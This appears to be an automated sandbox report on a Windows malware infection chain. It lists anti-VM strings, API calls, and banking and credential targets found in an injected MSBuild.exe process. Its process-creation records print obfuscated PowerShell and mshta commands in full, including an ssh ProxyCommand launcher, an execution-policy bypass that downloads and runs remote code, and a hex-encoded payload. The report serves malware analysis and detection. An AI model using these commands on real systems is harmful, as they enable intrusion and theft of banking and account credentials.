Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33907
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39782
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56827
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58293
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58905
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 30886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46272
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: updater.exe, updater.exe, 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1689930439.00000000017E6000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1702579988.0000000001749000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1703952737.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1704197239.0000000001837000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1703952737.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 0000001D.00000003.1863714133.00000000018D6000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1870952465.0000000001927000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1870469712.000000000184F000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1870747218.000000000189B000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft hyper-v video
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: svchost.exe, 0000000D.00000002.2561845194.0000023B7DA2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C33744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWindowClass
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000A.00000002.2552065652.0000026C337A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2568499605.0000023B7F055000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2567263276.0000023B7F043000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: powershell.exe, 00000010.00000002.2561671020.0000026A1DBFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMMR
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: ssh.exe, 00000006.00000002.2549945050.000001C0F70D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2536711690.000001CAB4E35000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000002.2548197082.0000000000A92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: mshta.exe, 0000000A.00000002.2569885759.000002743632B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
Source: AutoIt3.exe, 00000021.00000002.1948857929.00000000017CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: MSBuild.exe, 0000001C.00000002.2564549704.00000000029DA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	API call chain: ExitProcess graph end node	graph_27-113182
Source: C:\faggbgb\AutoIt3.exe	API call chain: ExitProcess graph end node
Source: C:\faggbgb\AutoIt3.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_017C34AF LdrInitializeThunk,

27_2_017C34AF

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C245D5 BlockInput,

27_2_00C245D5

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BC5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

27_2_00BC5240

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BE5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

27_2_00BE5CAC

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C2C6D9 LoadLibraryA,GetProcAddress,

27_2_00C2C6D9

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017D5106 mov eax, dword ptr fs:[00000030h]	27_2_017D5106
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9199 mov eax, dword ptr fs:[00000030h]	27_2_017C9199
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9199 mov eax, dword ptr fs:[00000030h]	27_2_017C9199
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9192 mov eax, dword ptr fs:[00000030h]	27_2_017C9192
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C9192 mov eax, dword ptr fs:[00000030h]	27_2_017C9192
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_017C32AD mov eax, dword ptr fs:[00000030h]	27_2_017C32AD
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018C503E mov eax, dword ptr fs:[00000030h]	29_2_018C503E
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B31E5 mov eax, dword ptr fs:[00000030h]	29_2_018B31E5
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B90CA mov eax, dword ptr fs:[00000030h]	29_2_018B90CA
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B90CA mov eax, dword ptr fs:[00000030h]	29_2_018B90CA
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B90D1 mov eax, dword ptr fs:[00000030h]	29_2_018B90D1
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_018B90D1 mov eax, dword ptr fs:[00000030h]	29_2_018B90D1

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

27_2_00C088CD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BDA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00BDA385
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00BDA354 SetUnhandledExceptionFilter,	27_2_00BDA354
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0036A354 SetUnhandledExceptionFilter,	29_2_0036A354
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_0036A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_0036A385

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Memory protected: page readonly | page read and write | page write copy | page guard

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C09369 LogonUserW,

27_2_00C09369

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00BC5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

27_2_00BC5240

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C11AC6 SendInput,keybd_event,

27_2_00C11AC6

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe

Code function: 27_2_00C151E2 mouse_event,

27_2_00C151E2

Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('Nect',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('In-Exion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value\|Get-Member)\|Where-Object{(Get-Variable _).Value.Name-ilike'nl*a'}).Name).Invoke((GCI Variable:\s).Value)\|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\27589682\updater.exe "C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'svaiml9wb7et1?evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaiml9wb7et1?evo1s'.substring(19, 57)" .
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cgmqb($seve){return -split ($seve -replace '..', '0x$& ')};$qbrr = 